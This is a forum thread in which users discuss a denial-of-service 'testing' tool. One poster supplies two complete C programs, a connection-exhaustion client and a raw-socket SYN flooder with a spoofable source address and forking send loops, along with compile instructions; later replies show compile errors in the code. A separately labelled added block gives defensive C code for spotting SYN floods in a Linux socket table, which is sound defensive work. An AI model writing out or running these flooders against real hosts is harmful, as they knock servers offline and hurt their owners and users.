Full Version: Dos Testing?
coder
OK, here we go-

> I'm writing some software that I'd like to test...
- A DoS client for Internet hosts. TCP Socks are established (continuously) until (hopefully) a maximum server load is reached. From this point on (or until something intervenes) the server/host should (in theory) not be able to handle much of a load (if not a complete DoS) although - that's what I'm trying to find out.
- So, if anyone happens to have some servers (hopefully something you actually have access to, I'd like some of the feedback data, if possible)
- If you do decide to test the software, I'd appreciate detailed feedback. Try to include obvious things like OS, Bandwidth (of both you and the server), timing (you can use the default if you wish), and any other details you might think important.

Well, That's my idea.
Tell me what you think?


segment
QUOTE (coder @ Oct 22 2003, 03:27 AM)
- If you do decide to test the software, I'd appreciate detailed feedback. Try to include obvious things like OS, Bandwidth (of both you and the server), timing (you can use the default if you wish), and any other details you might think important.

Pretty lame excuse. All you have to do is send it to securityfocus' vuln-dev list and you will get all sorts of feedback. As for the DoS part of it, again pretty lame considering you don't state your purpose for doing the test. Consider for example... I wrote a pentest tool called brat.c (Border Router Attack Tool) whose purpose was to cause BGP routers (specifically ABR's, DBR's, and BR's) to flap as each other. I won't explain in case you don't know what happens when a router flaps. (google route flap dampening).

The original idea behind this tool was to prove a theory. That as say ABR1 I could break the connection between ABR1 and ABR2 by sending back data as ABR1 causing a flap which would throw penalties to kill the connection... Reason for this was to show that any scriptkiddietard could break connections (if given enough hosts not bandwidth) between border routers.

While it sucked to write something like that, I sent it to people I know at Cisco, Juniper, and sent it to others to evaluate. Would take a bit of tweaking but the tool works. I just won't post how exactly it will work due to scriptkiddietards with too much time on their hands.

Now to answer what I mean by lame... What is the purpose of the tool for in nothing other than 3y3 wr0t3 a n3w t0ol which is what this sounds like. And I don't mean to flame so take this as you want, if you're just looking for input on the tool then send it to vuln-dev@securityfocus.com with a write up explaining what you think it's supposed to do and you'll get feedback. However, if you're not sure it works why bother. Have you tested it yourself, if so a decent coder would be able to port it to any system.

kill -9 2centsd
shaun2k2
What the (filtered) is lame anyway? E.g. you might say knocking somebody off the Internet because you selfishly want their nick on your favourite IRC network is lame...So (filtered), you've reached your goal...

Coder, here's a linux version:

CODE

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#define MAX_CON 1025 /* You may have to change this, depending on your OS */
int main(int argc, char *argv[]) {
       if(argc < 3) {
               printf("Usage: %s <host> <port>\n", argv[0]);
               exit(-1);
       }

       int sock[MAX_CON];
       int i;
       struct sockaddr_in dest[MAX_CON];
       struct hostent *host;
       if((host = gethostbyname(argv[1])) == -1) {
               printf("Couldn't resolve %s!\n", argv[1]);
               exit(-1);
       }

       for(i = 0; i <= MAX_CON; i++) {
               if((sock[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                       printf("Couldn't create socket!\n");
                       exit(-1);
               }

               dest[i].sin_family = AF_INET;
               dest[i].sin_port = htons(atoi(argv[2]));
               dest[i].sin_addr = *((struct in_addr *)host->h_addr);

               if(connect(sock[i], (struct sockaddr *)&dest[i], sizeof(struct sockaddr)) == -1) {
                       printf("Couldn't connect to %s on port %s!\n", argv[1], argv[2]);
                       exit(-1);
               }

               printf("%d : Connected!\n", i);
       }
       return(0);
}


I assume this is the sort of thing you are trying to do? Process table starvation attacks, despite being very simple to do, are very effective, you can often bring a server to its knees with an attack like this.


Thank you for your time.
Shaun.
coder
hey, great S2k2 ! I really like your ports...

QUOTE
rewt@0[localhost]$ gcc locksock1.c
locksock1.c: In function `main':
locksock1.c:18: warning: comparison between pointer and integer
virus
Yeee ha !
I'm in for this one. Just a few days back my instructor for CCSP showed us a live demo of a DOS attack on one of the webservers on our LAN and believe me it was fun. We used synk4 to generate the SYN packets. I'll try this on the same LAN and post results for you coder

wickkeedd
shaun2k2
If you want a really simple, lightweight syn flooder, try this code I wrote:

CODE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>
int main(int argc, char *argv[]) {
       if(argc < 3) {
               printf("Usage: %s <dst> <port> <src>\n", argv[0]);
               printf("Synflooder v2.0 was written by shaunige@yahoo.co.uk\n");
               exit(-1);
       }

       int sock;
       int on = 1;
       char packet[4096]; /* Datagram. */
       struct sockaddr_in dest;
       struct iphdr *ip = (struct iphdr *) packet;
       struct tcphdr *tcp = (struct tcphdr *) packet + sizeof(struct iphdr);
       struct hostent *he;
       if((he = gethostbyname(argv[1])) == NULL) {
               printf("Couldn't resolve hostname!\n");
               exit(-1);
       }

       if((sock = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1) {
               printf("Socket failed!\n");
               printf("Must be root to make raw socket.\n");
               exit(-1);
       }
       dest.sin_family = AF_INET;
       dest.sin_port = htons(atoi(argv[2]));
       dest.sin_addr = *((struct in_addr *)he->h_addr);
       memset(packet, 0, 4096); // Zero out packet.

       /* We'll fill in the header outselves. */
       if((setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0 ) {
               perror("setsockopt");
               exit(1);
       }
       // Fill in IP headers.
       ip->ihl = 5;
       ip->version = 4;
       ip->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
       ip->id = htons(1337);
       ip->saddr = inet_ntoa(atoi(argv[3]));
       ip->daddr = inet_ntoa(dest.sin_addr);
       ip->ttl = 255;
       ip->protocol = 6;
       ip->check = 0;
       ip->tos = 0;
       ip->frag_off = 0;

       // Fill in TCP headers.
       tcp->source = htons(1337);
       tcp->dest = htons(atoi(argv[2]));
       tcp->seq = htons(random());
       tcp->ack = 0;
       tcp->syn = 1;
       tcp->window = htons(65535);
       tcp->check = 0;
       tcp->doff = 5;
       tcp->rst = 0;
       tcp->psh = 0;
       tcp->fin = 0;
       tcp->urg = 0;
       tcp->ack_seq = htons(0);
       printf("Syn flooding: %s!\n", argv[1]);
       /* Insert some more fork()'s in here, if you want. */
       fork();
       fork();
       while(1) {
       sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(struct sockaddr));
       }
       return(0);
}


Compile: gcc synflood.c -o synflood


Thank you for your time.
Shaun.
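
For the defender's side of the two programs posted in this thread, here is an added example (not part of the thread or written by any poster) that reads a socket table in Linux `/proc/net/tcp` layout and reports how many sockets on a port sit in SYN_RECV and how many one remote address holds. The sample table is constructed, and the names `count_rows` and `max_per_source` are made up for this sketch.

```c
#include <stdio.h>
#include <string.h>
enum { ST_SYN_RECV = 0x03 }; /* "st" column value for a half-open socket */

/* Constructed sample in Linux /proc/net/tcp layout, trailing columns cut. */
static const char *SAMPLE =
    "  sl  local_address rem_address   st\n"
    "   0: 00000000:0050 00000000:0000 0A\n"
    "   1: 0A00000A:0050 0500000A:C001 01\n"
    "   2: 0A00000A:0050 0500000A:C002 01\n"
    "   3: 0A00000A:0050 0500000A:C003 01\n"
    "   4: 0A00000A:0050 0101A8C0:0539 03\n"
    "   5: 0A00000A:0050 0201A8C0:0539 03\n"
    "   6: 0A00000A:0016 0500000A:E000 01\n";

/* Parse the next data row into v = {laddr, lport, raddr, rport, state}.
   Addresses stay in the kernel's hex form and serve as opaque keys. */
static const char *next_row(const char *p, unsigned v[5]) {
    while (*p) {
        char line[128];
        size_t n = strcspn(p, "\n");
        snprintf(line, sizeof line, "%.*s", (int)n, p); /* one line at a time */
        p += n + (p[n] == '\n');
        if (sscanf(line, " %*d: %8x:%4x %8x:%4x %2x", v, v+1, v+2, v+3, v+4) == 5)
            return p;
    }
    return NULL; /* no rows left */
}

/* Sockets on local `port`; `state` 0 = any state, `src` 0 = any remote address. */
int count_rows(const char *t, unsigned port, unsigned state, unsigned src) {
    unsigned v[5];
    int n = 0;
    while ((t = next_row(t, v)) != NULL)
        n += v[1] == port && (!state || v[4] == state) && (!src || v[2] == src);
    return n;
}

/* Largest number of sockets on `port` held by a single remote address. */
int max_per_source(const char *t, unsigned port, unsigned *worst) {
    unsigned v[5];
    int best = 0;
    for (const char *p = t; (p = next_row(p, v)) != NULL;) {
        int n = v[2] ? count_rows(t, port, 0, v[2]) : 0; /* skip LISTEN rows */
        if (n > best) { best = n; *worst = v[2]; }
    }
    return best;
}
```

Fed the contents of `/proc/net/tcp` on a live host, a high SYN_RECV count spread over many addresses matches the SYN-flood pattern, while a high per-source count matches the connection-holding client; what counts as "high" is site-specific.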
shaun2k2
[Double post removed, digger]
coder
spe141.testdrive.hp.com> gcc synflood.c -o synflood
synflood.c:14:23: missing terminating " character
synflood.c: In function `main':
synflood.c:15: error: parse error before "shaunige"
synflood.c:15: error: syntax error at '@' token
synflood.c:15: error: stray '\' in program
synflood.c:15:23: missing terminating " character
spe141.testdrive.hp.com>
shaun2k2
CODE

[root@localhost DoS]# gcc synflood-2.0.c -o synflood-2.0
[root@localhost DoS]#


Maybe you pasted the code wrong?


-Shaun.
coder
dang it, I don't know C well enough to debug all this code - I have yet to successfully compile any of your code. oh well - better hit the books...